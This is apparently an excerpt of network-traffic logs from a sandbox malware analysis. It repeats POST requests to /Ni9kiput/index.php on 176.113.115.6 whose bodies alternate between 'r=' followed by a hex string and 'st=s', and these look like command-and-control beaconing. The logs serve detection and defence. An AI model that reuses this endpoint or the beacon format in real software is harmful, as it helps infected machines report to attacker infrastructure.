Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
